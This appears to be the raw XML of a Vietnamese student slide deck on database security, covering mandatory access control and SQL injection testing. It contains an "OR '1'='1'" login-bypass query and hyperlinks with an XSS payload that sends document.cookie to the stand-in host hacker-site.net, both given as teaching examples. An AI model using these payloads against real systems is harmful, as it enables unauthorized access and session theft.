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96" r:id="rId2"/>
    <p:sldId id="297" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="281" r:id="rId5"/>
    <p:sldId id="282" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="284" r:id="rId8"/>
    <p:sldId id="285" r:id="rId9"/>
    <p:sldId id="286" r:id="rId10"/>
    <p:sldId id="287" r:id="rId11"/>
    <p:sldId id="288" r:id="rId12"/>
    <p:sldId id="289" r:id="rId13"/>
    <p:sldId id="290" r:id="rId14"/>
    <p:sldId id="291" r:id="rId15"/>
    <p:sldId id="292" r:id="rId16"/>
    <p:sldId id="293" r:id="rId17"/>
    <p:sldId id="294" r:id="rId18"/>
    <p:sldId id="295" r:id="rId19"/>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1860" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="34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hyperlink" Target="http://hacker-site.net/%E2%80%9D+document.cookie;" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hacker-site.net/"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example.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com/name=var+i=new+Image;+i.src=%E2%80%9Dhttp:/hacker-site.net/%E2%80%9D+document.cookie;" TargetMode="Externa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352" y="-137534"/>
            <a:ext cx="1939524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txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8587763" y="1324108"/>
            <a:ext cx="1398750" cy="139875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6" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9810750" y="-1485776"/>
            <a:ext cx="13258553" cy="132585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571500" cap="sq">
              <a:solidFill>
                <a:srgbClr val="F80B0D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRP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9" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9848915" y="622495"/>
            <a:ext cx="812410" cy="81241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5759"/>
            </a:solidFill>
            <a:ln w="161925" cap="sq">
              <a:solidFill>
                <a:srgbClr val="F80B0D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRP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latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 12"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10883424" y="-413081"/>
            <a:ext cx="11113206" cy="11113161"/>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997" r="-25997"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US">
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="909602" y="6473540"/>
            <a:ext cx="8306192" cy="589777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="4900"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3500" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>MÔN: Bảo mật cơ sở dữ liệu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="927232" y="7251782"/>
            <a:ext cx="5226215" cy="441018"/>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DHHTTT17B - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>420300409302</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" b="1">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8355465" y="5537746"/>
            <a:ext cx="4611720" cy="4611720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4611720" h="4611720">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4611720" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4611720" y="4611720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="461172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US">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="AutoShape 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5533097" y="7678671"/>
            <a:ext cx="3176777" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="904656" y="9277350"/>
            <a:ext cx="7236478" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100" cap="flat">
            <a:solidFill>
              <a:srgbClr val="293E6B"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Crimson Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642418" y="2803505"/>
            <a:ext cx="8555901" cy="2078839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="17780" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="40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Chủ đề 6: Một cách tiếp cận để kiểm tra bảo mật của phần mềm ứng dụng cơ sở dữ liệu</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="40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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6435579" y="7211443"/>
            <a:ext cx="1371814" cy="434221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3640"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>NHÓM 6</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373234" y="8659264"/>
            <a:ext cx="8999366" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="3640"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B599B"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>GIẢNG VIÊN HƯỚNG DẪN  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3B599B"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t>ThS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3B599B"/>
                </a:solidFill>
                <a:latin typeface="Crimson Pro" charset="0"/>
              </a:rPr>
              <a:t> VÕ NGỌC TẤN PHƯỚC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Freeform 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2337050" cy="1019595"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2337050" h="1019595">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2337050" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2337050" y="1019595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1019595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Crimson Pro"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62B5-A663-355D-DDFE-E19CED7334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411FDD-3A73-6FAF-EEF4-CA4B7FAF1017}"/>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D278905-418D-3162-1EBE-51A900D3E923}"/>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356EC57-1CA7-E828-AC9B-6CC5C63E307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ED79D14-FF7D-A3BD-3D77-38AC14FE27E9}"/>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2E6C6732-3C54-4070-8192-7C256629F7E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E4242AE-E8EA-82B1-F124-DE6DC72B53C1}"/>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B1CE218-775F-DAB4-EB46-7E4BF0C3B118}"/>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 Mô hình kiểm soát truy cập bắt buộc (MAC)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A59A33F-EEF6-95EA-06ED-11F8191D6F66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4344093"/>
            <a:ext cx="9067800" cy="1246495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ảo mật nhằm hạn chế khả năng mà chủ sở hữu tài nguyên riêng lẻ phải cấp hoặc từ chối quyền truy cập vào các đối tượng tài nguyên trong hệ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>thống tệp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E918F119-E2E2-25B7-CEF4-66ABC05B862D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1301096" y="8063747"/>
            <a:ext cx="8909704" cy="1246495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Sau khi nhãn được áp dụng và chính sách MAC được hoàn tất, người dùng chỉ có thể truy cập những tài nguyên đó (hoặc thông tin trong tài nguyên) mà họ có quyền truy cập.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9BE7266-53F9-A626-1D4B-17B0A83422AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1317777" y="5747545"/>
            <a:ext cx="8969223" cy="2015936"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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vi-VN" sz="2500">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Người dùng A có thể có quyền truy cập thông tin trong tài nguyên có nhãn “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Tài liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> M bị hạn chế", nhưng Người dùng B có thể không có quyền tương tự. Tương tự, Người dùng B có thể có quyền truy cập vào tài nguyên được gắn nhãn "Bí mật của Dự án X", nhưng Người dùng A có thể không được phép làm như vậy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ADC9688-FF9B-5333-9B44-189C6DD89166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10371388" y="4064463"/>
            <a:ext cx="7013074" cy="5245779"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1657369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F494-DC98-37A4-E23D-20304F27FD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2724CC-E3F5-C363-A1BA-FF9388FAC28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D2D082E1-F46F-79C7-165F-E02458D3B177}"/>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63320CFD-F229-C3C2-A1AF-C9C17450B66B}"/>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35866254-2C5A-EA41-FB35-1454E1C1761C}"/>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05862809-AF84-AAE6-2AE6-19012A507B9E}"/>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A5C76962-33B1-024D-86A6-AB0B7B68F5F8}"/>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93966AAF-3E29-7608-B8B1-81E53D40C606}"/>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Ví dụ cụ thể cho: Mô hình kiểm soát truy cập bắt buộc (MAC)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A68204B-600D-277C-2470-302BD5BC6D8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="662009" y="4189243"/>
            <a:ext cx="5452722" cy="3994862"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBDE37BE-A7B5-A6BE-7321-9364E726BB95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6188542" y="4240297"/>
            <a:ext cx="6075339" cy="4112650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2612D0F1-7EAE-A299-9A71-C5272EECE779}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12290322" y="4202437"/>
            <a:ext cx="5534827" cy="4112992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48005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A4EA4-AC53-E082-DCEE-C74E19038F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8FDB6A-ED30-EA7D-0C8D-8B7EBE4FA2FD}"/>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69C1CDEF-43B6-80B8-7B1A-3EC881EC15A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1DB91F7-E91C-AE59-3419-F7138CC8D675}"/>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ED1BE891-C9F1-2DF3-5A82-7FA564C0020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19DC9DC-51FD-89E0-0F08-32C8443B6A2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01FB2E2-B909-6B21-5EED-C00C0969E8A1}"/>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3</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latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Xây dựng vấn đề</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3E0BBCF-A306-7FDE-F88B-4840AFC94A2F}"/>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3.1 Tấn công SQL Injection</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88A448-F015-0709-F115-469AE326846F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="4311370"/>
            <a:ext cx="7391400" cy="2785378"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Đầu vào được gán cho các biến input1 và input2 và nội dung của biến đó sẽ được sử dụng để tự động tạo truy vấn câu lệnh SQL như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> sau:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2500" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>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mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ví dụ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>SELECT * FROM tbl_user WHERE username =  ' ' OR '1' = '1' and password = ' ' OR '1' = '1'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC02664-C891-F556-7420-8C9AECC6170F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8841154" y="3752547"/>
            <a:ext cx="9145733" cy="4942426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF524F44-140B-362F-B22D-42DE1D172B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11582400" y="8814499"/>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Tấn công SQL Injection</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501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56EF-3B2C-6B51-C666-892F2E0FB2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A07184-5F9A-89A7-47F8-EFFC2F2AA52F}"/>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F482E250-B3C8-9ED9-7A05-0F801B6A8DE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
